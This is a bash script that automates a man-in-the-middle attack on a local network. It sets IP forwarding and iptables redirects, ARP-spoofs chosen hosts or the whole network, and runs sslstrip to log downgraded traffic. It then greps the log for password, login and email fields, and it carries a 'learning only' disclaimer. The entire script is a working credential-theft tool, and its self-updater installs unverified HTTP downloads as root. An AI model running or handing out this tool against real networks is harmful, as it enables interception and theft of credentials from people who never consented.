#!/bin/bash
# Little bash script to launch a man-in-the-middle attack and sslstrip.
# version 0.6 by comaX
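PROGNAME=$(basename "$0")  # script name without its directory
VERSION="0.6.2"
#Let's define some arguments that can be passed to the script :
args=  # not used anywhere in this file; kept only so nothing that expects it breaks
# Walk the command line one argument at a time. -h prints help and exits,
# -u runs the self-updater, anything else is reported and skipped.
while [ $# -ge 1 ]; do
  case "$1" in
    -h | --help) #define help message
      clear
      echo -e "You are running $0, version $VERSION.
usage : $0 [-h | --help] | [-u | --upadte]
-h or --help : displays this help message, disclaimer and exit.
-u or --update updates and installs this script
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for you actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credential and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you very basic shell script
programming.
\033[31m Changelog :\033[m
added in v0.6
-Support for multiple targets
added in v0.5 :
-Parameters for this great help message and update, more comments.
-Minor improvments
added in v0.4 :
-User friendly case insensitive answers (Y/y)
-Option to map network, retrieving live hosts and their dns names
-Minor improvments
\033[31m Credits :\033[m
Credits goes to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Please criticize this program or submit ideas on the official thread at
http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
      exit ;;
    -u | --update) #update program
      echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
      read -re proceed
      if [[ "$proceed" == "y" || "$proceed" == "Y" ]]; then
        # NOTE(review): the download is plain HTTP and nothing verifies a checksum or
        # signature, so whatever the network hands back is installed into /usr/bin and
        # then executed with this script's (root) privileges. Do not run the updater
        # from a network you do not trust.
        update_tmp=$(mktemp) || { echo "Could not create a temporary file, update aborted." >&2; exit 1; }
        # wget -O creates the output file even when the download fails, so the copy
        # into /usr/bin must be conditional on wget's exit status.
        if wget http://comax.pagesperso-orange.fr/mitm.sh -O "$update_tmp"; then
          cp -- "$update_tmp" /usr/bin/mitm #copy it to /usr/bin
          rm -f -- "$update_tmp" #delete temp file
          echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
          sleep 3
          chmod +x /usr/bin/mitm #make newly installed script executable
          exec /usr/bin/mitm #replace this process with the new script, as the prompt promised
        else
          rm -f -- "$update_tmp"
          echo -e "\033[31m Download failed.\033[m Continuing with this version (you are using $0)." >&2
          sleep 2
        fi
      else
        # ';' rather than '&': the original backgrounded the echo by mistake
        echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)."
        sleep 2
      fi ;;
    *)
      echo "Invalid parameters, coninuing with script $0"
      sleep 2 ;;
  esac
  shift
done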
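clear
echo -e "===========================================================================
=\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
= Feel free to contribute, and distribute this script as you please. =
= Official thread : http://tiny.cc/mitmautomate =
= Check out the help (-h) to see new features and informations =
= You are running version $VERSION. =
==========================================================================="
echo
echo
# Starting fresh : reset ip forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
# Writing the sysctl and flushing iptables both normally require root; no exit
# status is checked here, the later cleanup() repeats the same reset.
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned." # reported once the work has actually been done, not before it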
# Defining exit function and other ending features
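cleanup() {
  #######################################
  # Stop what the script started, reset forwarding and iptables, show the
  # sslstrip log, then offer to keep the log and to install the script.
  # Globals:   sslstripid (read) - pid of the backgrounded sslstrip; empty when
  #                                cleanup runs before sslstrip was started
  #            filename   (read) - log name the user chose; empty in the same case
  # Arguments: none
  # Outputs:   progress messages and the filtered log lines on stdout
  # Returns:   never returns; always exits the script with status 0
  #######################################
  local logfile="/tmp/${filename}.txt"
  echo
  echo "[+] Killing processes and resetting iptable."
  # An empty pid would make kill complain, so only kill what was actually started.
  if [[ -n "${sslstripid}" ]]; then
    kill "${sslstripid}"
  fi
  killall arpspoof
  echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
  iptables --flush # there are probably too many resets here,
  iptables --table nat --flush # but at least we're sure everything's clean
  iptables --delete-chain
  iptables --table nat --delete-chain
  echo "[+] Clean up successful..."
  if [[ -n "${filename}" && -f "${logfile}" ]]; then
    echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
    echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
    # same search terms as before; grep -E is the non-deprecated spelling of egrep
    grep -E --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" -- "${logfile}"
    echo
    echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
    echo "If you want to keep it, it will be stored in /root/$filename.txt"
    read -re keep
    if [[ "$keep" == "Y" || "$keep" == "y" ]]; then
      mv -- "${logfile}" "/root/${filename}.txt" #moving file
      if [[ -f "/root/${filename}.txt" ]]; then #check if it exists
        echo "Log file copied !" #it does
      else
        echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
      fi
    else
      rm -f -- "${logfile}" #removing temp file
      echo "All logs deleted"
    fi
  else
    # reached before sslstrip wrote anything (e.g. after an invalid arp choice)
    echo "No log file was written."
  fi
  if [[ -f "/usr/bin/mitm" ]]; then #already installed: nothing more to do
    echo
    echo
    exit 0 # a normal end of run, not a failure
  fi
  echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
  read -re install
  # the original test was written as $install="y", which is a non-empty string
  # and therefore always true: the script installed itself whatever the answer
  if [[ "$install" == "Y" || "$install" == "y" ]]; then
    cp -- "$0" /usr/bin/mitm #install the script that is running, wherever it was started from
    chmod +x /usr/bin/mitm #same as the update path
    echo -e "\033[32m Script installed !\033[m"
  else
    echo "Script not installed."
  fi
  exit 0
}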
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating ip forwarding... \033[m"
# Makes this host forward packets that are not addressed to it; writing the
# sysctl normally requires root and its status is not checked.
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
echo
read -e outport
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
echo
read -e inport
echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
# $inport and $outport are passed unquoted and unvalidated: an empty or
# non-numeric answer makes iptables reject (or misparse) the rule, and since the
# exit status is ignored the script carries on with no redirect in place.
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Arpspoofing
echo
echo -e "\033[31m [+] Activating arpspoofing... \033[m"
echo
ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
echo
echo "Enter gateway ip adress (as shown above) :"
read -e gateway # used later unquoted in fping/arpspoof command lines; not validated as an address
echo
echo "What interface would you like to use ? (it should match gateway ip as shown above)"
read -e iface # likewise passed straight to arpspoof -i
echo
echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
read -e choicearp # anything other than Y/y/N/n ends the run via cleanup() below
echo
if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
echo
echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
# Assumes the gateway sits in a /24. stdout and stderr both go to a fixed,
# predictable path in world-writable /tmp, which another local user could
# pre-create; nothing checks fping's exit status.
fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
rm /tmp/hosts.txt # remove temporary file
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
#######################################
# Launch one arpspoof xterm per given address (at most 6) and remember the
# addresses for the summary message.
# Globals:   iface, gateway (read); t1..t6 (written, may be empty)
# Arguments: $1..$6 - target ip addresses; $1 is mandatory, the rest optional
# Outputs:   a blank line for each unused slot
# Returns:   status of the last command run (not checked by the caller)
#######################################
arpspoofi() {
# Each xterm is backgrounded and its stderr discarded, so a failed launch
# (bad interface, missing tool) simply closes without any message here.
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
# [[ "$n" > "0" ]] is a string comparison, not a numeric one: it is true for any
# non-empty address and false when the argument was not supplied at all.
if [[ "$2" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$3" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$4" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$5" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
else echo
fi
if [[ "$6" > "0" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
else echo
fi
# exported to the caller purely for the "Targeting ..." message below
t1=$1
t2=$2
t3=$3
t4=$4
t5=$5
t6=$6
}
echo "Enter ip adresses"
read -e parameters
# Deliberately unquoted: the single input line is word-split into the positional
# arguments. Anything beyond the sixth address is silently ignored.
arpspoofi $parameters
echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
# $! here is the pid of the xterm, not of arpspoof; cleanup() never reads
# arpspoofid anyway, it relies on killall arpspoof.
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
else echo "Your choice is invalid. Quitting."
# sslstripid and filename are only assigned further down, so cleanup() runs its
# kill and log-file steps against empty values on this path.
cleanup
fi
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output :"
read -e filename # used unquoted and unvalidated to build the log path below
# Listens on $outport (the iptables redirect target chosen earlier). The log
# goes to a predictable path in world-writable /tmp; $! records the pid so that
# cleanup() can stop it.
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
echo
echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
echo
echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
echo
echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
echo
read quitting # no -e here, unlike the retries below; none of them use -r
# $quitting is unquoted inside single brackets: an empty line makes [ fail with
# "unary operator expected", input containing spaces with "too many arguments";
# either way the else branch runs, so it behaves like a wrong answer.
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup
else echo "Bad choice. Enter quit to stop attack"
echo
echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
# Four attempts in total; every branch ends in cleanup(), which exits the script.
cleanup
fi
fi
fi
fi